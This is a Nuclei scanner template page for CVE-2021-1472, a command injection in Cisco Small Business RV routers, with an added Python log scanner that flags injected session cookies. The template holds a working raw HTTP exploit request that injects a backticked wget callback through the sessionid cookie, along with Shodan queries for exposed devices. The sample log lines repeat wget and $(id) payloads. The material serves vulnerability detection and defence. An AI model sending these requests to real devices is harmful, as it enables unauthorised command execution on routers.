Cisco Small Business RV Series - OS Command Injection
ID: CVE-2021-1472
Severity: critical
Author: gy741
Tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive
Description
Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
YAML Source
id: CVE-2021-1472

info:
  name: Cisco Small Business RV Series - OS Command Injection
  author: gy741
  severity: critical
  description: |
    Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
  remediation: |
    Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
  reference:
    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
    - http://seclists.org/fulldisclosure/2021/Apr/39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-1472
    cwe-id: CWE-287,CWE-119
    epss-score: 0.97174
    epss-percentile: 0.99793
    cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv160_firmware
    shodan-query:
      - http.html:"Cisco rv340"
      - http.html:"cisco rv340"
    fofa-query: body="cisco rv340"
  tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionid='`wget http://{{interactsh-url}}`'
        Authorization: QUt6NkpTeTE6dmk4cW8=
        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536

        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="option"

        5NW9Cw1J
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="destination"

        J0I5k131j2Ku
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file.path"

        EKsmqqg0
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file"; filename="config.xml"
        Content-Type: application/xml

        qJ57CM9
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="filename"

        JbYXJR74n.xml
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="GXbLINHYkFI"

        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
        -----------------------------392306610282184777655655237536--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body
        words:
          - '"jsonrpc":'
# digest: 4b0a00483046022100807ff5f85ac3609da48acf4d625b3de19ea99fb13ecf8d3a6bd0ed1252d212f6022100ee7d26e4b402e3d2fc266cf50d8499bd49ab7582b43b0a5c36604974a3e95a2f:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-1472.yaml"
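The template above fires on an out-of-band callback, which tells you whether a device is exploitable but not whether it is being probed. The complementary, defender-side check is to watch the management interface's own request logs for sessionid cookies that carry shell metacharacters (the injection vector the template exercises). The following is an added example, not part of the Nuclei template or Cisco's software: it parses constructed, tab-separated request-log lines (timestamp, source IP, method, path, raw Cookie header), flags any sessionid value that contains shell metacharacters or does not match an assumed token format, and returns the findings as records a SIEM rule could consume. The log format and the 16-64 alphanumeric token shape are assumptions for the example.

```python
import re

# Shell metacharacters that should never appear in a session token.
# Constructed for this example; extend to match your own parser's concerns.
SHELL_META = re.compile(r"[`$;|&<>\n]|\$\(")

# Assumed legitimate token shape: 16-64 alphanumeric characters.
SESSION_OK = re.compile(r"^[A-Za-z0-9]{16,64}$")

# Constructed sample log: ts, src_ip, method, path, raw Cookie header ("-" if none).
SAMPLE_LOG = (
    "2021-04-08T10:00:01Z\t192.0.2.10\tPOST\t/upload\tsessionid=8f3a1c9d2b7e4a6f0c1d2e3f4a5b6c7d\n"
    "2021-04-08T10:00:02Z\t198.51.100.7\tPOST\t/upload\tsessionid='`wget http://example.invalid/x`'\n"
    "2021-04-08T10:00:03Z\t203.0.113.5\tPOST\t/upload\tsessionid=abc$(id)def\n"
    "2021-04-08T10:00:04Z\t192.0.2.11\tGET\t/\t-\n"
)


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header into name -> value without normalising quotes,
    so that injected characters survive for inspection."""
    cookies = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, value = part.split("=", 1)
        cookies[name.strip()] = value.strip()
    return cookies


def suspicious_sessionid(cookie_header: str) -> tuple:
    """Return (is_suspicious, reason) for the sessionid cookie in a header."""
    sid = parse_cookie_header(cookie_header).get("sessionid")
    if sid is None:
        return (False, "no sessionid cookie")
    if SHELL_META.search(sid):
        return (True, "shell metacharacter in sessionid")
    if not SESSION_OK.match(sid):
        return (True, "sessionid does not match expected token format")
    return (False, "ok")


def scan_log(text: str) -> list:
    """Run the sessionid check over every log line; return one finding per hit."""
    findings = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) != 5:
            continue  # malformed line; skip rather than guess
        ts, src, method, path, cookie = fields
        if cookie == "-":
            continue
        hit, reason = suspicious_sessionid(cookie)
        if hit:
            findings.append({"ts": ts, "src": src, "path": path, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the check runs on the raw Cookie header rather than on the value after the web server has decoded it, it catches the quoted-backtick form used by the template as well as the `$(...)` form; a production rule would also want to alert on any `/upload` request whose sessionid never appeared in a successful login.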